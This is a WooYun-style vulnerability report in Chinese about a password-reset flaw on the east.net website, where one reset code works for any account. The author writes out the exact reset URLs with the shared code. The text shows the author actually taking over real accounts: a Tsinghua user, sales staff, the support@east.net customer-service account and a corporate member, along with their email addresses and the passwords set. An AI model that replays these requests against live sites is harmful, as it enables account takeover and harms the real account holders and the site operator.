WooYun.org

inurl:www.east.net/user/showUserSuccess
这个案例我会说清楚的
一步一步来
通过这个，打开
http://www.east.net/user/showUserSuccess?email=caiym@tsinghua.org.cn
获取到第1个邮箱

这里我用BURP抓包，修改成我的激活邮件，失败了

这个网站的原理，我分析过，如果修改这里邮箱
那么，如果你的邮箱没在网络上注册，那么他会提示1个不存在该邮箱
后来我自己就注册了一个
同样发包，还是没有发到我的邮箱去
我们思路是，自己注册1个邮箱
这个地址是个关键
http://www.east.net/user/showUserSuccess?email=caiym@tsinghua.org.cn
如当前=caiym@tsinghua.org.cn 我们要改为他的密码
我们先给自己发重置密码
搭配我们自己的邮箱
http://www.east.net/user/showUserSuccess?email=466196038@qq.com
接着发送

这里重发1次就可以了
接着，我们在邮箱里找到我们邮箱密码重置CODE

这时候访问下
http://www.east.net/user/userForgetPassword?code=b0f47076c2df6d4d44296952099ce6ab&email=466196038%40qq.com
我发现1个很大的问题
他的CODE几乎是通用的
也就是说，这个KEY可以任何邮箱通用
比如现在到了重置密码这步了
我们看看

我们还记得我们要改掉谁的密码把
当然就是他：caiym@tsinghua.org.cn
我们先登录自己账号看看

由于是刚注册的，所以什么也没有
关键来了，我们要改掉caiym@tsinghua.org.cn的密码，那么就要配合这个通用CODE
组合下
http://www.east.net/user/userForgetPassword?code=b0f47076c2df6d4d44296952099ce6ab&email=caiym@tsinghua.org.cn
这样

我们就改为7788250cc
试试

注意
账号：caiym@tsinghua.org.cn
密码：7788250cc
登录看看

成功了，看看

一览无遗。
我们还可以发现一个地方

上个销售部的，很明显，CODE都是通用的，我们照样可以改掉它的
配合下
http://www.east.net/user/userForgetPassword?code=b0f47076c2df6d4d44296952099ce6ab&email=luguohe@east.net
同样改成7788250cc
登录看看

沦陷了吧~~

部门
客服部
销售部
续费部
联系电话
010-62692880-1600
010-62692880-5858
010-62692880-1800
电子邮箱
support@east.net
sales@east.net
xufei@east.net
传真
010-62692880-1105
010-62691675
010-62691003

这里有三个邮箱
先来改客服部的support@east.net
试试
同样改成7788250cc
http://www.east.net/user/userForgetPassword?code=b0f47076c2df6d4d44296952099ce6ab&email=support@east.net

客服部沦陷了。。
==========================================================
再来改1个企业会员的
http://www.east.net/user/showUserSuccess?email=admin@cmmrchina.com
配合下
http://www.east.net/user/userForgetPassword?code=b0f47076c2df6d4d44296952099ce6ab&email=admin@cmmrchina.com
7788250zz改成这个
登录看看

又沦陷了~~~